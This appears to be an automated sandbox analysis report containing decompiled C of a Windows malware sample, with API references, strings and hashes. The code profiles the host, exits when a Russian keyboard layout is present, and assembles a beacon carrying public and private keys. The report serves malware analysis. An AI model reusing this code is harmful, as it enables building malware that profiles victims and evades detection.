									}
									_push(_t260);
									_t155 = E0F4E6FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf4ef350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F4E8AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F4E8AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F4E7B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F4E7B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F4E7410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0f4e7490
0x0f4e7490
0x0f4e749b
0x0f4e74a7
0x0f4e74b7
0x0f4e74b9
0x0f4e74bc
0x0f4e74c1
0x0f4e74c8
0x0f4e74c8
0x0f4e74d2
0x0f4e74df
0x0f4e74e6
0x0f4e74e8
0x0f4e74eb
0x0f4e74f0
0x0f4e74f0
0x0f4e7500
0x0f4e7556
0x0f4e755a
0x0f4e75f5
0x0f4e75f9
0x0f4e76f9
0x0f4e76fd
0x0f4e770d
0x0f4e770f
0x0f4e7725
0x0f4e7728
0x0f4e772f
0x0f4e7731
0x0f4e7749
0x0f4e7756
0x0f4e7758
0x0f4e7758
0x0f4e772f
0x0f4e775f
0x0f4e77ce
0x0f4e77d2
0x0f4e77d7
0x0f4e77e3
0x0f4e77ea
0x0f4e77ec
0x0f4e77ec
0x0f4e77ea
0x0f4e77f3
0x0f4e7807
0x0f4e7817
0x0f4e781a
0x0f4e781c
0x0f4e7824
0x0f4e782c
0x0f4e782c
0x0f4e7837
0x0f4e783b
0x0f4e7842
0x0f4e7849
0x0f4e7856
0x0f4e785e
0x0f4e7864
0x0f4e786a
0x0f4e786a
0x0f4e7880
0x0f4e7887
0x0f4e7889
0x0f4e7890
0x0f4e7896
0x0f4e7896
0x0f4e789c
0x0f4e78b5
0x0f4e78b5
0x0f4e78c8
0x0f4e78d0
0x0f4e78d6
0x0f4e78dd
0x0f4e78f0
0x0f4e78f6
0x0f4e78fb
0x0f4e7919
0x0f4e78fd
0x0f4e7914
0x0f4e7914
0x0f4e792e
0x0f4e7931
0x0f4e7931
0x0f4e7943
0x0f4e7af2
0x0f4e7af9
0x0f4e7b42
0x0f4e7b4b
0x0f4e7b4b
0x0f4e7b09
0x0f4e7b0f
0x0f4e7b17
0x0f4e7b36
0x0f4e7b36
0x00000000
0x0f4e7b36
0x0f4e7b19
0x0f4e7b1b
0x0f4e7b22
0x00000000
0x00000000
0x0f4e7b30
0x00000000
0x0f4e7949
0x0f4e7957
0x0f4e795e
0x0f4e7965
0x0f4e796c
0x0f4e7973
0x0f4e797a
0x0f4e7981
0x0f4e7988
0x0f4e798e
0x0f4e7991
0x0f4e7994
0x0f4e79a0
0x0f4e79a0
0x0f4e79a3
0x0f4e79a6
0x0f4e79a7
0x0f4e79ad
0x0f4e79b2
0x0f4e79b5
0x0f4e79ba
0x0f4e79bd
0x0f4e79bf
0x0f4e79c2
0x0f4e79c7
0x0f4e79cf
0x0f4e79d5
0x0f4e79da
0x0f4e79eb
0x0f4e79f6
0x0f4e7a04
0x0f4e7a08
0x0f4e7a12
0x0f4e7a28
0x0f4e7a30
0x0f4e7acb
0x00000000
0x0f4e7acb
0x0f4e7a52
0x0f4e7a55
0x0f4e7a57
0x0f4e7a5c
0x0f4e7a68
0x0f4e7a6b
0x0f4e7a6d
0x0f4e7a70
0x0f4e7a79
0x0f4e7a8a
0x0f4e7a98
0x0f4e7a9a
0x0f4e7aac
0x0f4e7ab4
0x0f4e7abf
0x0f4e7abf
0x0f4e7ad6
0x0f4e7ad7
0x0f4e7ada
0x0f4e7ae6
0x0f4e7ae8
0x0f4e7aed
0x00000000
0x0f4e7aed
0x0f4e7761
0x0f4e7765
0x0f4e7776
0x0f4e7778
0x0f4e777c
0x0f4e7782
0x0f4e77c3
0x0f4e77c3
0x0f4e77c8
0x0f4e77c9
0x0f4e77cb
0x00000000
0x0f4e77cb
0x0f4e7784
0x0f4e778b
0x00000000
0x0f4e77bc
0x00000000
0x00000000
0x0f4e77ae
0x00000000
0x00000000
0x0f4e77b5
0x00000000
0x00000000
0x0f4e77a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e778b
0x0f4e775f
0x0f4e760d
0x0f4e7616
0x0f4e7620
0x0f4e7623
0x0f4e7625
0x0f4e7628
0x0f4e762d
0x0f4e7634
0x0f4e763d
0x0f4e763f
0x0f4e7642
0x0f4e764c
0x0f4e765f
0x0f4e7667
0x0f4e76c4
0x0f4e76c4
0x0f4e76c6
0x00000000
0x0f4e76c6
0x0f4e766c
0x0f4e7681
0x0f4e7689
0x0f4e7694
0x0f4e768b
0x0f4e768b
0x0f4e768b
0x0f4e769d
0x0f4e76a7
0x00000000
0x0f4e76a9
0x0f4e76b9
0x0f4e779a
0x0f4e779c
0x0f4e77a1
0x0f4e77a1
0x0f4e76bf
0x0f4e76bf
0x0f4e76c9
0x0f4e76c9
0x0f4e76de
0x0f4e76e0
0x0f4e76ed
0x00000000
0x0f4e76f3
0x0f4e756e
0x0f4e7570
0x0f4e7573
0x0f4e758b
0x0f4e7592
0x0f4e759a
0x0f4e75de
0x0f4e75e8
0x0f4e75ef
0x00000000
0x0f4e75ef
0x0f4e759f
0x0f4e75b6
0x0f4e75be
0x0f4e75c9
0x0f4e75c0
0x0f4e75c0
0x0f4e75c0
0x0f4e75d2
0x0f4e75dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e7502
0x0f4e7510
0x0f4e7512
0x0f4e7517
0x00000000
0x00000000
0x0f4e7519
0x0f4e752f
0x0f4e7536
0x0f4e7551
0x0f4e7551
0x0f4e7553
0x00000000
0x0f4e7553
0x0f4e7538
0x0f4e753f
0x00000000
0x00000000
0x0f4e7551
0x00000000
0x0f4e7551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F4E74B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0F4E74C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F4E74E6
GetComputerNameW.KERNEL32 ref: 0F4E74F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E7510
wsprintfW.USER32 ref: 0F4E7551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F4E756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F4E7592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F4E4810,?), ref: 0F4E75B6
GetLastError.KERNEL32 ref: 0F4E75C9
RegCloseKey.KERNEL32(00000000), ref: 0F4E75D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F4E75EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F4E760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F4E7623
wsprintfW.USER32 ref: 0F4E763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F4E765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F4E4810,?), ref: 0F4E7681
GetLastError.KERNEL32 ref: 0F4E7694
RegCloseKey.KERNEL32(?), ref: 0F4E769D
lstrcmpiW.KERNEL32(0F4E4810,00000419), ref: 0F4E76B1
wsprintfW.USER32 ref: 0F4E76DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E76ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F4E770D
wsprintfW.USER32 ref: 0F4E7756
GetNativeSystemInfo.KERNEL32(?), ref: 0F4E7765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F4E7776
wsprintfW.USER32 ref: 0F4E779A
ExitProcess.KERNEL32 ref: 0F4E77A1
wsprintfW.USER32 ref: 0F4E77C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F4E7807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F4E781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F4E7824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F4E785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E7890
wsprintfW.USER32 ref: 0F4E78C8
lstrcatW.KERNEL32(?,0000060C), ref: 0F4E78DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F4E78E9
GetProcAddress.KERNEL32(00000000), ref: 0F4E78F0
lstrlenW.KERNEL32(?), ref: 0F4E7900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F4E7931

Part of subcall function 0F4E7B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0F4E7B8D
Part of subcall function 0F4E7B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F4E7C01
Part of subcall function 0F4E7B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F4E7C16
Part of subcall function 0F4E7B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E7C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F4E7988
GetDriveTypeW.KERNEL32(?), ref: 0F4E79CF
lstrcatW.KERNEL32(?,?), ref: 0F4E79F6
lstrcatW.KERNEL32(?,0F4F030C), ref: 0F4E7A08
lstrcatW.KERNEL32(?,0F4F0380), ref: 0F4E7A12
GetDiskFreeSpaceW.KERNEL32(?,?,0F4E4810,?,00000000), ref: 0F4E7A28
lstrlenW.KERNEL32(?,?,00000000,0F4E4810,00000000,00000000,00000000,0F4E4810,00000000), ref: 0F4E7A70
wsprintfW.USER32 ref: 0F4E7A8A
lstrlenW.KERNEL32(?), ref: 0F4E7A98
wsprintfW.USER32 ref: 0F4E7AAC
lstrcatW.KERNEL32(?,0F4F03A0), ref: 0F4E7ABF
lstrcatW.KERNEL32(?,0F4F03A4), ref: 0F4E7ACB
lstrlenW.KERNEL32(?), ref: 0F4E7AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F4E7B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F4E7B30

Strings

undefined, xrefs: 0F4E7549
RtlComputeCrc32, xrefs: 0F4E78DF
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F4E771B
Control Panel\International, xrefs: 0F4E7581
ntdll.dll, xrefs: 0F4E78E4
ProcessorNameString, xrefs: 0F4E7871
Keyboard Layout\Preload, xrefs: 0F4E7655
error, xrefs: 0F4E774E
%I64u/, xrefs: 0F4E7A84
WORKGROUP, xrefs: 0F4E7541
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F4E7525
Domain, xrefs: 0F4E7520
productName, xrefs: 0F4E7716, 0F4E773A
00000419, xrefs: 0F4E76A9
@, xrefs: 0F4E759F
?:\, xrefs: 0F4E79AD
LocaleName, xrefs: 0F4E75AE
x86, xrefs: 0F4E77BC
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F4E773F
x64, xrefs: 0F4E77A7
%I64u, xrefs: 0F4E7AA3
Unknown, xrefs: 0F4E77C3
Itanium, xrefs: 0F4E77B5
iqt, xrefs: 0F4E76B1
ARM, xrefs: 0F4E77AE
Identifier, xrefs: 0F4E78A6
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F4E7876, 0F4E78AB

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: iqt$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-671888634
Opcode ID: a913a76e962fac673dd9fd67a7ebc86512fcc31e36ca8587b15bcf179eab49e1
Instruction ID: a719fd2b6830b3ca7bd59d9061865db2ae43c445982b0c3914a8029c165ec6d2
Opcode Fuzzy Hash: a913a76e962fac673dd9fd67a7ebc86512fcc31e36ca8587b15bcf179eab49e1
Instruction Fuzzy Hash: C512CF70A40305AFEB20DFA4CC45FAABBB4FF44716F10051AFE55AA292D7B4A918CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0F4E5860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0F4E3BC0( &_v148);
				E0F4E7490( &_v236, __edx); // executed
				_t266 = E0F4E72A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0F4E7D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0F4E70A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0F4E35C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xf4f2a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xf4f2a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0F4E5F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0F4E54F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0F4E7D70( &_v200);
						return 0;
					}
				}
			}

0x0f4e586f
0x0f4e5870
0x0f4e5872
0x0f4e5873
0x0f4e5878
0x0f4e587e
0x0f4e5882
0x0f4e5884
0x0f4e5885
0x0f4e5887
0x0f4e5888
0x0f4e588a
0x0f4e588b
0x0f4e588d
0x0f4e588e
0x0f4e5890
0x0f4e5893
0x0f4e5895
0x0f4e5896
0x0f4e589f
0x0f4e58a8
0x0f4e58b9
0x0f4e58bb
0x0f4e58c4
0x0f4e58ca
0x0f4e58d0
0x0f4e58d6
0x0f4e58d8
0x0f4e58dc
0x0f4e58e3
0x0f4e58ec
0x0f4e5901
0x0f4e5905
0x0f4e58f2
0x0f4e58f2
0x0f4e58f5
0x0f4e58f9
0x0f4e58fd
0x0f4e58fd
0x0f4e590f
0x0f4e5916
0x0f4e592f
0x0f4e592f
0x0f4e5931
0x0f4e5918
0x0f4e5918
0x0f4e591d
0x00000000
0x0f4e591f
0x0f4e591f
0x0f4e5921
0x0f4e5925
0x0f4e5927
0x0f4e5929
0x0f4e5929
0x0f4e591d
0x0f4e593a
0x0f4e593e
0x0f4e594d
0x0f4e594f
0x0f4e594f
0x0f4e595b
0x0f4e5d98
0x0f4e5da3
0x0f4e5da9
0x0f4e5db9
0x0f4e5961
0x0f4e5961
0x0f4e596d
0x0f4e5980
0x0f4e5985
0x0f4e5999
0x0f4e59a2
0x0f4e59b6
0x0f4e59bb
0x0f4e59c5
0x0f4e59c9
0x0f4e59cd
0x0f4e59d5
0x0f4e59d7
0x0f4e59db
0x0f4e59de
0x0f4e59f5
0x0f4e59e4
0x0f4e59e7
0x0f4e59eb
0x0f4e59ef
0x0f4e59ef
0x0f4e5a00
0x0f4e5a06
0x0f4e5a10
0x0f4e5a10
0x0f4e5a1c
0x0f4e5a22
0x0f4e5a24
0x0f4e5a30
0x0f4e5a30
0x0f4e5a34
0x0f4e5a39
0x0f4e5a3f
0x0f4e5a41
0x0f4e5a41
0x0f4e5a43
0x0f4e5a46
0x0f4e5a4a
0x0f4e5a4a
0x0f4e5a4f
0x0f4e5a55
0x0f4e5a57
0x0f4e5a5b
0x0f4e5a60
0x0f4e5a60
0x0f4e5a65
0x0f4e5a6b
0x0f4e5a6e
0x0f4e5a6e
0x0f4e5a73
0x0f4e5a74
0x0f4e5a76
0x0f4e5a7a
0x0f4e5a60
0x0f4e5a7e
0x0f4e5a8e
0x0f4e5a9b
0x0f4e5a9f
0x0f4e5aa3
0x0f4e5aac
0x0f4e5ab8
0x0f4e5ac0
